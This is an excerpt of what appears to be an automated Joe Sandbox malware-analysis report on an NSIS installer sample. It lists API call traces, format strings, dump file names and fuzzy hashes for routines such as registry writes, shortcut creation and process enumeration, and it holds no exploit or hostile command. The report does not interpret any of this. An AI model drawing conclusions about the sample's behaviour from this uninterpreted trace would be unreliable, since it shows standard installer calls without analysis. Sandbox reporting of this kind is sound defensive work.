                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                          • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
APIs
• CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
Strings
• CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
Similarity
• API ID: CreateInstance
• String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
• API String ID: 542301482-1377821865
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                          • String ID: F$N$open
                                                                                                                                                                                                                                                                                                          • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                          • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                          • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                          • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
